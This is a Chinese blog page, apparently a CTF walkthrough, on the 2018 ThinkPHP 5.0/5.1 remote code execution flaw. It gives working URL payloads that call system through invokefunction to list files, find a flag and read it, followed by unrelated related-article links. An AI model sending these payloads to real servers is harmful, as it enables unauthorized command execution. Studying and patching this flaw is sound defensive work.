ThinkPHP 5漏洞简介

ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。

漏洞分析

程序未对控制器进行过滤，导致攻击者可以用 \（斜杠）调用任意类方法。

漏洞利用
构造payload：

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“ls”);%27
寻找flag：

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“find / -name ‘flag’”);%27

查看flag：

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat …/…/…/flag”);%27

ThinkPHP V5 漏洞利用相关推荐

1. 威胁预警|多个挖矿僵尸网络开始使用ThinkPHP v5漏洞 威胁升级

   前言 12月10日ThinkPHP团队发布了版本更新,修复了一处远程命令执行漏洞,该漏洞是由于ThinkPHP框架对控制器没有进行严格的安全过滤,致使攻击者可以伪造恶意参数进行代码执行.12月11日阿 ...

2. ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用

   一.组件介绍 1.1 基本信息 ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和Ta ...

3. THINKPHP网站漏洞怎么修复解决

   THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查 ...

4. ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用（GetShell）

   ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...

5. ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现

   php中文网最新课程 每日17点准时技术干货分享 0x00 前言 ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新 ...

6. php命令执行漏洞利用,ThinkPHP 5.0 5.1远程命令执行漏洞利用分析

   1漏洞利用方式 5.0版本POC(不唯一) 命令执行:? s=index/thinkapp/invokefunction&function=call_user_func_array&v ...

7. ThinkPHP V5.0.5漏洞_漏洞考古：thiknphp5 代码执行漏洞

   thinkphp版本:v5.0.5 下载地址 https://www.thinkphp.cn/down/870.html poc:?s=index/thinkapp/invokefunction&am ...

8. ThinkPHP漏洞利用

   漏洞标志 影响版本 ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 漏洞利用 先查看版本号.在网址上随意输入一个不存在的模块 地址: 可以看到,thin ...

9. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

   DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

最新文章

1. 简单易上手编译FFmpeg
2. 机器学习-降维之奇异值分解SVD算法原理及实战
3. 最简单的模拟U盘病毒(Autorun.inf)
4. Leetcode每日一题：122.best-time-to-buy-and-sell-stock-ii(买股票的最佳时机Ⅱ)
5. 命名实体识别_命名实体识别的几种标注形式
6. 登录获取token，token参数关联至所有请求的请求体内
7. JetBrains(Intellij, pycharm)多行编辑模式
8. Atitit 知识聚合的方法大总结 目录 1. 什么是聚合 汇聚 1 2. 聚合化应用场景 2 2.1. 一站式 2 3. 知识聚合的历史与趋势
9. python queue的用法_PYTHON多进程用法之四（Queue）
10. Android模拟器 使用 Fiddler抓包
11. 2022爱分析･人工智能应用实践报告
12. 使用内网服务器上线微信小程序总结
13. JTAG IEEE 1194.1笔记
14. 机器学习之逻辑回归 Logistic Regression（三）scikit-learn算法库
15. 第01章 Tableau数据可视化概述
16. 全球时间与北京时间、UTC时间关系表
17. 毛永胜计算机教师,中等职业学校网络计算机技术与应用
18. 【Face Recognition人脸识别】3. 单张图片人脸识别
19. 从键盘上输入一位整数，当输入1~7时，显示对应的英文星期名称的缩写。
20. 有强烈的危机感，是一种病吗？

热门文章

1. 实战_05_SpringBoot整合redis单机版本
2. 一个简洁实用的后台管理系统AWESOME
3. 循环结构， while， do……while
4. 解析html生成xpath,html使用xpath解析xml
5. c++ 编写函数返回两个值最小值_结合实例来分析SQL的窗口函数
6. 绿联串口线linux驱动下载,绿联usb转db9驱动下载
7. BugkuCTF-MISC题where is flag2
8. 武汉计算机应用中职学校,武汉市中职学校计算机应用基础课程抽考.Doc
9. mysql 函数返回查询结果_MySQL数据库中常用查询函数简介
10. php生成10万个字符串,有什么好的方法可以生成十万条不重复的13位纯数字字符串...